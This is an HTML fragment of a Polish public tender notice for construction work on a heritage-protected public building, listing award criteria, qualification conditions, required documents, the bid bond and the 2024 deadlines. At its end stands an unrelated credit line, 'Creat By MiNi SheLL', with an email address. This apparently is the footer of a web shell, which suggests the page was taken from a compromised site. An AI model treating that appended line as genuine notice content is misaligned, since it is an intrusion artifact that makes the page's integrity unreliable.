SWZ.<br/>2. Zamawiający w oparciu o art. 253 ust. 1 pkt. 1 ustawy Pzp sporządzi streszczenie oceny i porównania złożonych ofert zawierających punktację przyznaną ofertom w każdym kryterium oceny i łączną punktację zgodnie ze wzorami zawartymi w rozdziale XIX SWZ.<br/>3. Przy wyborze oferty Zamawiający będzie kierował się niżej określonymi kryteriami (przy założeniu, że 1% = 1 pkt).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie okresu gwarancji jakości i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	Warunki udziału w postępowaniu:<br/>1)	w zakresie zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	w zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3)	w zakresie sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4)	w zakresie zdolności technicznej lub zawodowej:<br/>	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>wykażą, że nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy,<br/>w tym okresie zrealizował:<br/>co najmniej jedno zamówienie związane z budową lub przebudową lub rozbudową obiektu użyteczności publicznej będącego pod opieką konserwatora zabytków o wartości nie mniejszej niż 500 000,00 zł brutto.<br/>Przez jedno zamówienie należy rozumieć jedną robotę budowlaną w ramach jednej umowy, zlecenia czy też kontraktu.<br/><br/>Wyżej wskazany okres 5 lat liczy się wstecz od dnia w którym upływa termin składania ofert.<br/>Zamawiający dopuszcza w celu spełnienia warunków udziału w postępowaniu, aby Wykonawca wykazał wykonanie ww. robót budowlanych w jednym zamówieniu lub w ramach osobnych dwóch zamówień (przez jedno osobne zamówienie należy rozumieć jedną robotę budowlaną w ramach jednej umowy/zlecenia czy też kontraktu). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu, o których mowa w art. 273 ust. 1 pkt 1 ustawy Pzp, Zamawiający żąda następujących oświadczeń i dokumentów; a) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2022 r. poz. 2581 ze zm.), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – wzór oświadczenia stanowi załącznik nr 6 do SWZ,<br/>b) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełnienia przez Wykonawcę ww. warunków udziału w postępowaniu, o których mowa w art. 273 ust. 1 pkt 2 ustawy Pzp Zamawiający żąda następujących dokumentów: wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty; wzór wykazu stanowi załącznik nr 7 do SWZ.<br/>Wyżej wskazany okres 5 lat liczy się wstecz od dnia w którym upływa termin składania ofert.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca zobowiązany jest do złożenia niżej podanych dokumentów:<br/>a) Formularz ofertowy, zgodnie z załącznikiem nr 1 do SWZ ,<br/>b) Oświadczenie o niepodleganiu wykluczenia z postępowania, zgodnie z załącznikiem nr 3 do SWZ – w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepodleganiu wykluczenia składa każdy z Wykonawców,<br/>c) Oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie z załącznikiem nr 2.1 do SWZ – w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składane jest przez Wykonawcę wykazującego spełnienie warunku,<br/>d) Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik,<br/>e) Pełnomocnictwo do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienie – dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o których mowa w rozdziale XI SWZ,<br/>f) Oryginał dokumentu poręczenia lub gwarancji wadialnej – zgodny z wymaganiami zawartymi w rozdziale XV SWZ,<br/>g) Zobowiązanie podmiotu udostępniającego zasoby zgodnie z załącznikiem nr 5 SWZ - jeżeli Wykonawca w celu potwierdzenia spełnienia warunków udziału polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby wraz z zobowiązaniem składa oświadczeniem o niepodleganiu wykluczeniu z postępowaniu tego podmiotu oraz oświadczeniem o spełnianiu warunków udziału w postępowaniu w zakresie w jakim Wykonawca powołuje się na jego zasoby<br/>h) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia określające, które roboty wykonują poszczególni Wykonawcy - zgodnie z załącznikiem nr 4 do SWZ – w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Każdy Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium w wysokości: 20 000,00 zł (słownie:<br/>dwadzieścia tysięcy złotych 00/00 gr).<br/>2. Wadium musi obejmować cały okres związania ofertą i może być wniesione: w pieniądzu, gwarancjach bankowych,<br/>gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9.11. 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3. W przypadku wyboru wpłaty wadium w pieniądzu należy je wnieść przelewem na rachunek bankowy Zamawiającego<br/>PKO Bank Polski S.A. 36 1020 4027 0000 1402 1525 1769.<br/>Przy wnoszeniu wadium Wykonawca winien na blankiecie przelewu powołać się na nazwę zadania podaną przez<br/>Zamawiającego. Wydanie polecenia przelewu nie jest jednoznaczne z wniesieniem, dokonaniem zapłaty określonej kwoty wadium. O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono w wymaganym terminie, decyduje data i<br/>godzina wpływu środków na wskazany wyżej rachunek Zamawiającego.<br/>4. Jeżeli Wykonawca wnosi wadium w innej formie niż pieniężna tj. w formie gwarancji lub poręczenia, Wykonawca<br/>przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej podpisany przez osobę lub osoby<br/>uprawnione ze strony gwaranta / poręczyciela przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy<br/>na stronie internetowej prowadzonego postępowania, o której mowa w rozdziale I SWZ. Z treści gwarancji winno wynikać<br/>bezwarunkowe, na każde żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie<br/>gwaranta/poręczyciela do wypłaty Zamawiającemu pełnej kwoty wadium we wszystkich okolicznościach określonych w<br/>ustawie Prawo zamówień publicznych - art. 98 ust. 6 ustawy Pzp.<br/>5. Wadium we wszystkich dopuszczonych formach wnosi się przed upływem terminu składania ofert i utrzymuje<br/>nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust.1 pkt 2 i 3<br/>oraz ust. 2 ustawy Pzp.<br/>6. Pozostałe zapisy dot. wadium znajdują się w rozdziale XV SWZ oraz wynikają z ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. 2.Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia. 3.Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Ustanowiony pełnomocnik<br/>pozostaje w kontakcie z Zamawiającym w toku postępowania: zwraca się do Zamawiającego z wszelkimi sprawami i do<br/>niego Zamawiający kieruje informacje, korespondencję itp. Pełnomocnictwo winno być załączone do oferty. 4. Przepisy<br/>Prawa zamówień publicznych dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o<br/>zamówienia. 5.Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o<br/>którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane. W<br/>odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane. W przypadku, o którym mowa w niniejszym punkcie,<br/>wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy, zgodnie z zał. 4 do SWZ. 6.W odniesieniu do<br/>warunków określonych w rozdziale VIII SWZ, wymagania te muszą być spełnione wspólnie przez Wykonawców<br/>składających ofertę w postępowaniu (nie musi spełniać osobno każdy z wykonawców składających ofertę wspólną). Na ich<br/>potwierdzenie należy złożyć dokumenty określone w pkt 5 rozdz. IX SWZ. 7. Każdy z Wykonawców występujących wspólnie<br/>zobowiązany jest do wykazania brak podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego. W<br/>takim przypadku oświadczenia i/lub dokumenty wymienione w rozdziale IX SWZ składa każdy z Wykonawców<br/>występujących wspólnie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw<br/>wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. 8. Pozostały zakres zawarto w rozdz. XI SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia zostały zawarte w projekcie umowy stanowiącym załącznik<br/>do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-01-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/871607</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-01-25 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-02-23</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których zachodzi okoliczność<br/>wskazana w art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com